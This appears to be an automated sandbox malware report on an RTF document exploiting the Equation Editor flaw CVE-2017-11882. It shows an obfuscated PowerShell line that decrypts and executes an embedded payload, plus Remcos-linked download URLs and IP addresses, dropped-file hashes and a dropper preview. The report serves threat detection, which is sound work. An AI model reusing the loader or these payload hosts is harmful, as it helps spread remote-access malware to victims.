'+'cniowxrowtig5switg7zfd9oyi4qwnw2dsa+q1jveygii0r57qf0caj6ce9ujcue17thtaaiql4mofqp8uqjn3viikukad9gjb73ylemkpbpyycaeu88vsgvza+wmnqqkojtucgsrahp+xfvolxiwkzrec6cdmhgqtbr7ul9x0coyu8fzvclezpcj9sc07ffdrohhuhbsqkccmgvkwzbfde4wi4qsxfr0cioaxw4x1d9oiazdvrlq7tvm7fwsdwkap1gku8ftkup76e06s7qo9memw3tq8quv7o4vz2irxs0ziv2zz43kztqlvpwu56krcwfhzt5wsmdlm6y/kjkaexzm4pluf7yebu0a9z1fi7c07qhaf50prc4b0p4vexv0bzhildo0tp8cckt4gwieeq3gfv2zur7rf0fu7hcrfcz3hfoxlelocy+jfmy8qqsqjd/xosq7loo1qttphgyqfwgzs1pb46tc9lri4voxvswx/gyt8ubh3smlcmjhqtdxw1skyoifbmmuyt6bekgthwo9bt9lstdzfjjap8pyu0ay5hre2jyplqwpugsonpjx2jpl/sc0h2tsg6gjn/cwa7+ltvkfzoynfx30kb9kkg120+unfkms3v8wisgryud+sxqwjcaoypvzwfy584bmta/hr64hnprrwpzoyj9tujt8uvo3tt9ewx1m9yksk8ytrjef02eowbw4wnumrgktnjffyymlsg2nnu1oxxqkoitig2lwgdnoejetoyem7c6a+wupv6mak+vas/xj/i0r6oik7upq6akeyei5dzzuzjjqccizdkfko6mbk4nidu0tenks2a67lz5fuj4pbw/s3wri//butcidgnv8v1qva1jgf41+wksq3kq4+9xtf4drv8toy/yzmuobgdp2ur+y3a2fqqh6nsjon1lo8srnwtjakyukfztnqcwdrqbh3gxlyxp4rqrjf639ikh0a6doidvbjfbrhrk3hkiv1d5dfx68wt1a2vfcyrrj6xvcgm6v6abmhoklbz+irrubegx7pm2fetr5camo9rgs2qwm0echifgb0yk+d7u3tksnz7mguquwdjgkv9b7rpt9c1lk0n1syoy8kxih4yniwpwrtz+l3+pjcwwt0polu/zov3dlsfamsjg+fubduuw6cb+/nfd6ny0tsrkis8ix3ddtansmncnbv4w+qkuagnu/k/ooziqqfamfxwerdymw9x5gz5l/oms8qnelxh1mjfegt8bddzfgl40osweew0um1i4dzqqezfqvqujd7vet4pm7lasim+cnryw2wavlcpcorugd9ti6vwdes0wp/cxdn70muygszqxqn+lyilh1wvofatte8/dmgxr5edat/cxjndrufdr9nawvkhhoi/iyjbgfepqik9qjzhhmsr22avo600gw==cni;tmitextodescriptografado = decrypt-aesencryption -'+'base64text tmitextocriptografadobase64 -key tmichave;w'+'rite-host cnitexe4j+e4jto descre4j+e4jiptografado: tmi'+'textodescriptograe4j+e4jfadocni;invoke-expressioe4j+e4jn tmitext'+'oe4j+e4jdescriptografado;e4j)-replace ([char]67+[char]110+['+'char]73),[char]34 -crepJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity Information121
    Scripting
    Valid Accounts211
    Command and Scripting Interpreter
    121
    Scripting
    11
    Process Injection
    1
    Masquerading
    OS Credential Dumping1
    Process Discovery
    Remote Services1
    Archive Collected Data
    1
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault Accounts52
    Exploitation for Client Execution
    1
    DLL Side-Loading
    1
    DLL Side-Loading
    21
    Virtualization/Sandbox Evasion
    LSASS Memory21
    Virtualization/Sandbox Evasion
    Remote Desktop ProtocolData from Removable Media2
    Ingress Tool Transfer
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain Accounts2
    PowerShell
    Logon Script (Windows)Logon Script (Windows)11
    Process Injection
    Security Account Manager1
    Application Window Discovery
    SMB/Windows Admin SharesData from Network Shared Drive1
    Non-Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
    Deobfuscate/Decode Files or Information
    NTDS1
    Remote System Discovery
    Distributed Component Object ModelInput Capture11
    Application Layer Protocol
    Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    Obfuscated Files or Information
    LSA Secrets1
    File and Directory Discovery
    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
    DLL Side-Loading
    Cached Domain Credentials13
    System Information Discovery
    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    e2VMPAayU1.rtf67%ReversingLabsDocument-RTF.Exploit.CVE-2017-11882
    e2VMPAayU1.rtf52%VirustotalBrowse
    e2VMPAayU1.rtf100%AviraHEUR/Rtf.Malformed
    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{9681AC94-218C-447B-8B38-4F8B3535CB8F}.tmp100%AviraEXP/CVE-2017-11882.Gen
    C:\Users\user\Desktop\~WRD0000.tmp100%AviraEXP/CVE-2017-11882.Gen
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    http://nuget.org/NuGet.exe0%URL Reputationsafe
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
    https://contoso.com/0%URL Reputationsafe
    https://nuget.org/nuget.exe0%URL Reputationsafe
    https://contoso.com/License0%URL Reputationsafe
    https://contoso.com/Icon0%URL Reputationsafe
    http://172.245.123.11/46/seethemoononlinetoseebeautygirl.gIFj0%Avira URL Cloudsafe
    http://go.microsoft.c0%Avira URL Cloudsafe
    http://172.245.123.11/46/seethemoononlinetoseebeautygirl.gIF0%Avira URL Cloudsafe
    http://go.micros0%Avira URL Cloudsafe
    http://198.46.176.133/Upload/vbs.jpeg100%Avira URL Cloudmalware
    http://198.46.176.1330%Avira URL Cloudsafe
    http://198.46.176.133/Upload/vbs.jpeg21%VirustotalBrowse
    http://172.245.123.11/46/seethemoononlinetoseebeautygirl.gIFj13%VirustotalBrowse
    http://172.245.123.11/46/seethemoononlinetoseebeautygirl.gIF14%VirustotalBrowse
    http://198.46.176.13317%VirustotalBrowse
    No contacted domains info
    NameMaliciousAntivirus DetectionReputation
    http://198.46.176.133/Upload/vbs.jpegfalse
    • 21%, Virustotal, Browse
    • Avira URL Cloud: malware
    unknown
    http://172.245.123.11/46/seethemoononlinetoseebeautygirl.gIFtrue
    • 14%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    http://go.microsoft.cpowershell.exe, 00000006.00000002.453239145.000000000024C000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://nuget.org/NuGet.exepowershell.exe, 00000006.00000002.454171582.0000000003429000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    unknown
    http://172.245.123.11/46/seethemoononlinetoseebeautygirl.gIFjEQNEDT32.EXE, 00000002.00000002.353863921.000000000028F000.00000004.00000020.00020000.00000000.sdmpfalse
    • 13%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000006.00000002.453486758.0000000002401000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    unknown
    http://go.microspowershell.exe, 00000006.00000002.453486758.0000000002BB5000.00000004.00000800.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://198.46.176.133powershell.exe, 00000006.00000002.453486758.000000000253B000.00000004.00000800.00020000.00000000.sdmpfalse
    • 17%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    https://contoso.com/powershell.exe, 00000006.00000002.454171582.0000000003429000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    unknown
    https://nuget.org/nuget.exepowershell.exe, 00000006.00000002.454171582.0000000003429000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    unknown
    https://contoso.com/Licensepowershell.exe, 00000006.00000002.454171582.0000000003429000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    unknown
    https://contoso.com/Iconpowershell.exe, 00000006.00000002.454171582.0000000003429000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    unknown
    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs
    IPDomainCountryFlagASNASN NameMalicious
    198.46.176.133
    unknownUnited States
    36352AS-COLOCROSSINGUSfalse
    172.245.123.11
    unknownUnited States
    36352AS-COLOCROSSINGUStrue
    Joe Sandbox version:40.0.0 Tourmaline
    Analysis ID:1485136
    Start date and time:2024-07-31 08:37:07 +02:00
    Joe Sandbox product:CloudBasic
    Overall analysis duration:0h 4m 47s
    Hypervisor based Inspection enabled:false
    Report type:full
    Cookbook file name:defaultwindowsofficecookbook.jbs
    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
    Number of analysed new started processes analysed:10
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Sample name:e2VMPAayU1.rtf
    renamed because original name is a hash value
    Original Sample Name:fbc6766776e17ffa02a6813e4f20b22b.rtf
    Detection:MAL
    Classification:mal100.expl.evad.winRTF@6/17@0/2
    EGA Information:Failed
    HCA Information:
    • Successful, ratio: 69%
    • Number of executed functions: 14
    • Number of non-executed functions: 5
    Cookbook Comments:
    • Found application associated with file extension: .rtf
    • Found Word or Excel or PowerPoint or XPS Viewer
    • Attach to Office via COM
    • Scroll down
    • Close Viewer
    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
    • Execution Graph export aborted for target EQNEDT32.EXE, PID 2188 because there are no executed function
    • Execution Graph export aborted for target powershell.exe, PID 2160 because it is empty
    • Not all processes where analyzed, report is missing behavior information
    • Report size getting too big, too many NtOpenKeyEx calls found.
    • Report size getting too big, too many NtQueryValueKey calls found.
    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
    TimeTypeDescription
    02:37:57API Interceptor68x Sleep call for process: EQNEDT32.EXE modified
    02:38:00API Interceptor22x Sleep call for process: wscript.exe modified
    02:38:01API Interceptor176x Sleep call for process: powershell.exe modified
    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    198.46.176.133Purchase Order.xlsGet hashmaliciousUnknownBrowse
    • 198.46.176.133/Upload/vbs.jpeg
    wEKsfBWbSz.rtfGet hashmaliciousRemcosBrowse
    • 198.46.176.133/Upload/vbs.jpeg
    4vzwJTZbwT.rtfGet hashmaliciousRemcosBrowse
    • 198.46.176.133/Upload/vbs.jpeg
    NySTAwCpzK.rtfGet hashmaliciousRemcosBrowse
    • 198.46.176.133/Upload/vbs.jpeg
    PI-002312.xlsGet hashmaliciousRemcosBrowse
    • 198.46.176.133/Upload/vbs.jpeg
    SATIN ALMA EMR#U0130.xlsGet hashmaliciousRemcosBrowse
    • 198.46.176.133/Upload/vbs.jpeg
    Purchase order.xlsGet hashmaliciousRemcosBrowse
    • 198.46.176.133/Upload/vbs.jpeg
    createdthingstobefrankwithmeeverywhere.gIF.vbsGet hashmaliciousGuLoader, RemcosBrowse
    • 198.46.176.133/Upload/vbs.jpeg
    createactiveimagesbeautygirlfrnd.gIF.vbsGet hashmaliciousRemcosBrowse
    • 198.46.176.133/Upload/vbs.jpeg
    screensimplethingstohandlecream.gIF.vbsGet hashmaliciousRemcosBrowse
    • 198.46.176.133/Upload/vbs.jpeg
    172.245.123.11Purchase Order.xlsGet hashmaliciousUnknownBrowse
    • 172.245.123.11/46/seethemoononlinetoseebeautygirl.gIF
    4vzwJTZbwT.rtfGet hashmaliciousRemcosBrowse
    • 172.245.123.11/47/BEN.txt
    PI-002312.xlsGet hashmaliciousRemcosBrowse
    • 172.245.123.11/47/BEN.txt
    BilseMHALF.rtfGet hashmaliciousUnknownBrowse
    • 172.245.123.11/90290/somethingnewthingsareupmeforgirls.gIF
    No context
    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    AS-COLOCROSSINGUSxz7e7f8SwS.rtfGet hashmaliciousRemcosBrowse
    • 192.3.101.142
    0a4dJxfs4Y.rtfGet hashmaliciousRemcosBrowse
    • 192.227.225.166
    cotizaci#U00f2n.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
    • 107.175.229.144
    Orden-23014.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
    • 107.173.4.12
    Orden de compra.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
    • 107.175.229.144
    PO-00349.xlsGet hashmaliciousRemcosBrowse
    • 192.3.101.142
    PO-00349.xlsGet hashmaliciousRemcosBrowse
    • 192.3.101.142
    Purchase Order.xlsGet hashmaliciousUnknownBrowse
    • 172.245.123.11
    waybill_shipping_documents_original_BL_CI&PL_29_07_2024_000000002024_doc.xlsGet hashmaliciousGuLoader, RemcosBrowse
    • 104.168.45.34
    POSH20240605.xlsGet hashmaliciousRemcosBrowse
    • 192.227.225.166
    AS-COLOCROSSINGUSxz7e7f8SwS.rtfGet hashmaliciousRemcosBrowse
    • 192.3.101.142
    0a4dJxfs4Y.rtfGet hashmaliciousRemcosBrowse
    • 192.227.225.166
    cotizaci#U00f2n.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
    • 107.175.229.144
    Orden-23014.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
    • 107.173.4.12
    Orden de compra.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
    • 107.175.229.144
    PO-00349.xlsGet hashmaliciousRemcosBrowse
    • 192.3.101.142
    PO-00349.xlsGet hashmaliciousRemcosBrowse
    • 192.3.101.142
    Purchase Order.xlsGet hashmaliciousUnknownBrowse
    • 172.245.123.11
    waybill_shipping_documents_original_BL_CI&PL_29_07_2024_000000002024_doc.xlsGet hashmaliciousGuLoader, RemcosBrowse
    • 104.168.45.34
    POSH20240605.xlsGet hashmaliciousRemcosBrowse
    • 192.227.225.166
    No context
    No context
    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    File Type:data
    Category:dropped
    Size (bytes):4760
    Entropy (8bit):4.834060479684549
    Encrypted:false
    SSDEEP:96:RCJ2Woe5u2k6Lm5emmXIGxgyg12jDs+un/iQLEYFjDaeWJ6KGcmXSFRLcU6/KD:cxoe5uVsm5emdOgkjDt4iWN3yBGHydcY
    MD5:838C1F472806CF4BA2A9EC49C27C2847
    SHA1:D1C63579585C4740956B099697C74AD3E7C89751
    SHA-256:40A844E6AF823D9E71A35DFEE1FF7383D8A682E9981FB70440CA47AA1F6F1FF3
    SHA-512:E784B61696AB19C5A178204A11E4012A9A29D58B3D3BF1D5648021693883FFF343C87777E7A2ADC81B833148B90B88E60948B370D2BB99DEC70C097B5C91B145
    Malicious:false
    Reputation:moderate, very likely benign file
    Preview:PSMODULECACHE............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script...............T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    File Type:data
    Category:dropped
    Size (bytes):64
    Entropy (8bit):0.34726597513537405
    Encrypted:false
    SSDEEP:3:Nlll:Nll
    MD5:446DD1CF97EABA21CF14D03AEBC79F27
    SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
    SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
    SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
    Malicious:false
    Reputation:high, very likely benign file
    Preview:@...e...........................................................
    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
    Category:dropped
    Size (bytes):421468
    Entropy (8bit):3.570272506767291
    Encrypted:false
    SSDEEP:3072:KHG9wf2YF/hNe4VTdRnTT8w4TWU7qtg/gl7p+lH1dS7tGd0LoJS7Et3Z+vYH:hwf2YFK7qi
    MD5:A7134156DC3A01AC743ED671C6FCE261
    SHA1:462834C8EAC709F4F6AE14DC8E88F8238B08CBE5
    SHA-256:96EBA88A40E1B29630E4D0CD374F3FE9B45EE1AD2F86821E824BF97D821A5CAE
    SHA-512:E473905BABF5515B8138AB83DA6946DFB7970C83FECD681659D3DD7A10CF0A7380FAB1C01D9C3931BAB0ECD25CDE09BC9B2D94BA1BFB4C21330DBD25EFD1545B
    Malicious:false
    Reputation:low
    Preview:..d.i.m. .t.h.e.r.m.i.a.t.r.i.a.E.E. .....t.h.e.r.m.i.a.t.r.i.a.E. .=. .p.a.g.o.d.e.i.r.o.........t.r.i.e.n.n.a.d.o.(.".L._.H.e.l.p.A.l.i.a.s._.0.0.1._.0._.M.e.s.s.a.g.e.".). .&. .t.h.e.r.m.i.a.t.r.i.a.E. .&. ._.....t.r.i.e.n.n.a.d.o.(.".L._.H.e.l.p.A.l.i.a.s._.0.0.2._.0._.M.e.s.s.a.g.e.".). .&. .t.h.e.r.m.i.a.t.r.i.a.E. .&. ._.....t.r.i.e.n.n.a.d.o.(.".L._.H.e.l.p.A.l.i.a.s._.0.0.3._.0._.M.e.s.s.a.g.e.".). .&. .t.h.e.r.m.i.a.t.r.i.a.E. .&. ._.....t.r.i.e.n.n.a.d.o.(.".X._.H.e.l.p.A.l.i.a.s._.0.0.4._.0._.M.e.s.s.a.g.e.".). .&. .t.h.e.r.m.i.a.t.r.i.a.E. .&. ._.....t.r.i.e.n.n.a.d.o.(.".X._.H.e.l.p.A.l.i.a.s._.0.0.5._.0._.M.e.s.s.a.g.e.".). .&. .t.h.e.r.m.i.a.t.r.i.a.E. .&. ._.....t.r.i.e.n.n.a.d.o.(.".X._.H.e.l.p.A.l.i.a.s._.0.0.6._.0._.M.e.s.s.a.g.e.".). .&. .t.h.e.r.m.i.a.t.r.i.a.E. .&. ._.....t.r.i.e.n.n.a.d.o.(.".X._.H.e.l.p.A.l.i.a.s._.0.0.7._.0._.M.e.s.s.a.g.e.".). .&. .t.h.e.r.m.i.a.t.r.i.a.E. .&. ._.....t.r.i.e.n.n.a.d.o.(.".X._.H.e.l.p.A.l.i.a.s._.0.0.8._.0._.M.e.s.s.a.g.e.".).
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:Composite Document File V2 Document, Cannot read section info
    Category:dropped
    Size (bytes):8704
    Entropy (8bit):5.027435365128715
    Encrypted:false
    SSDEEP:96:gqmMPwSwjlnXBSv5Oc+9Qip5rgMPVSwjNCnXBSv5Oc+9Qip5:gKPwSwRneOZHpzPVSwxCneOZHp
    MD5:C81DAE6C86EF04E663DB10D68A00DFD5
    SHA1:9249B0A5B3F143FF574A05C53AAE963CA71E3C37
    SHA-256:6DC8270002A7C2C2150328A573717041C677852F3DFC6A45E840699E3A26EC55
    SHA-512:2DAA569DAFA886C5D52D378B110A7C812AB9869BEC9255A6BEB42C4036E500D8361C7247E580C7EACF74739726BC1FC17F764905669B265C76149882AA2F5DAC
    Malicious:true
    Antivirus:
    • Antivirus: Avira, Detection: 100%
    Reputation:low
    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):1024
    Entropy (8bit):0.05390218305374581
    Encrypted:false
    SSDEEP:3:ol3lYdn:4Wn
    MD5:5D4D94EE7E06BBB0AF9584119797B23A
    SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
    SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
    SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
    Malicious:false
    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):16384
    Entropy (8bit):3.5746146258381843
    Encrypted:false
    SSDEEP:384:HvDDep0ns5v0a6v6zgcJt1TwBltgv/3sQvs2O26253cK4rDKZ:H3m0sRFC4gcT1TwBlOv/cQq25M1GZ
    MD5:A86778DE211C9DFB34BEAE905E5C0377
    SHA1:905E64420E1C08F0FFF4810A228888A09AA38DE2
    SHA-256:726E5E9B6FAE795D89EFC0E7ACC23A4227F5047288474902755098E72F55FAB6
    SHA-512:80D3201134BFAF2E0C4DFF26C346088E859D3DB6122380974EE3FA9DB577A847E8A5CBC69ABF14E16D9FB942703A3CFFC70490F5B8723D08827722A540BDB7E3
    Malicious:false
    Preview:......9.3.4.7.1.2.1.2.5.=.].?.?.?.4.`.;.^.?.*.!.4.4.8...;.9.%.(.<...6.?.$.....;.0.5.>...4.,.0.?.3.*.$.<./.?.%.<.9.].).1.[.`.-.'.?.-.~.;.`.4.%...@.?.?.;.%.5...,.#.?.).,.%.*.?.9.1.).7.*.8.+.4.7.?.!.>.-._.?.....6.1.%.3.=.0._.!.~.3.*.5.*.[.<...*.?.].&.2.(.3.5.7.%.?.?.^.?.7.>.(.;.?.[.!.8.[._.^.$.[.3.(.+.?.].<.?.2.`.>.6.5.4.[.~.:.6.-./.7...4.$.^.....#.?.1.0.&.`.:.).`.8.?.5...1.-._.|.1.&.).6.>.%.:.@.3.?...!.?.#.[...?.1.9.[.~.?.1.4.'.3.6.%.3.0.9.&.?.&.$.;.<.2.).(.)...~.=.+.?.?.%.'.9...<.0.-.%.3.?.2.|.8.;.0.:.%._.&.7.?.&.(.'.+.[.9.@.1.=.,.~.)...9.#.|.:.0...1.1.6.%.=._.'.1.:.=...%.?.*.-.`.).0.<.8...&...?.1.].=.=.!.:.4._.?.*.|.:.*.,.,.%.@.$.#./.5.]...,.4.`.].|.6.!.0.).`.`.@.$.?._.%.`.#.5.@.8.!.*.|.(.*.).~.2.].).;._.^.^.,.%.=.+.-.+.>.'.(.$.].$.%.%.`.?.=.]...%.~.>.$.7...(.).;.7.+.=.$.:.*...,.>.5.#.,.'.=.(.`.!.;.;.3.%.?.7.*.).?.@.../.$.?.;.;.?.).4.*.,.?.,.5.-.~.3.?.;.2.~.(.?.@.4.@.?.^.1.7.>.?.&._.~.?.^.*.'.-.?...#.%.*.<.[.9.7.@.?.&.7.-.=.:.8...8.).&.^.%.!._.!.~.^.8.).|.%.<.`...3.%.=.!.#.:.;.1.&.#.8.
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):1536
    Entropy (8bit):1.3586208805849456
    Encrypted:false
    SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlb8:IiiiiiiiiifdLloZQc8++lsJe1Mzdl
    MD5:619A3983D0353C60A6057378CC2DFB59
    SHA1:DE2419F984B3EA8F6B0B24BE581F5A97F1A7F090
    SHA-256:2AB02488A30049597A7C6B1F4DD4046AAD40B712D8FC33B03DC278B47634A6EB
    SHA-512:1580D27667062EB8B54424F54307AEF6BF1049F45DA5EE8C43E15D2092529C651314717BA1F15A634439B8CB9C854FDA14427786194128C8D48FB9DDE1F70A15
    Malicious:false
    Preview:..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................
    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    File Type:very short file (no magic)
    Category:dropped
    Size (bytes):1
    Entropy (8bit):0.0
    Encrypted:false
    SSDEEP:3:U:U
    MD5:C4CA4238A0B923820DCC509A6F75849B
    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
    Malicious:false
    Preview:1
    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    File Type:very short file (no magic)
    Category:dropped
    Size (bytes):1
    Entropy (8bit):0.0
    Encrypted:false
    SSDEEP:3:U:U
    MD5:C4CA4238A0B923820DCC509A6F75849B
    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
    Malicious:false
    Preview:1
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:08 2023, mtime=Fri Aug 11 15:42:08 2023, atime=Sun Jun 30 05:37:55 2024, length=96629, window=hide
    Category:dropped
    Size (bytes):1014
    Entropy (8bit):4.543908049087547
    Encrypted:false
    SSDEEP:12:8SFgXg/XAlCPCHaXvB+B/5YXX+WRexWIjmi0icvb5C64uiADtZ3YilMMEpxRljKP:8+/XT/44XzeflfeVGADv3qJk7N
    MD5:CEB282D768F722D40CE8E259365587D4
    SHA1:F7FBAA8959B0B93AD476689F4F92B0DCD05596A4
    SHA-256:50471AB330FDB2B29BD8E981FF89917408F82252CF86DF5EF3F90E2B24E4523E
    SHA-512:4EA60D0ADAB45EDE6DD4CC3866FF2B63453E6882302C8FBEC35D805D34721CF9A9C325D52549DE2AC74E3EF36C5C2929FDA1200D4652B9864819AC325BA7073C
    Malicious:false
    Preview:L..................F.... ....?..r....?..r....,.-....uy...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......X.4..user.8......QK.X.X.4*...&=....U...............A.l.b.u.s.....z.1......WF...Desktop.d......QK.X.WF.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....f.2.uy...X.4 .E2VMPA~1.RTF..J.......WE..WE.*.........................e.2.V.M.P.A.a.y.U.1...r.t.f.......x...............-...8...[............?J......C:\Users\..#...................\\621365\Users.user\Desktop\e2VMPAayU1.rtf.%.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.e.2.V.M.P.A.a.y.U.1...r.t.f.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......621365..........D_....3N...W...9.W.e8...8.....[D_....3N...W...9.W.e8
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:Generic INItialization configuration [folders]
    Category:dropped
    Size (bytes):55
    Entropy (8bit):4.749452668030777
    Encrypted:false
    SSDEEP:3:HLFEiAYCm4cEiAYCv:HL+i9Ci9s
    MD5:869AADE1575BD6786662932F9DD4FC37
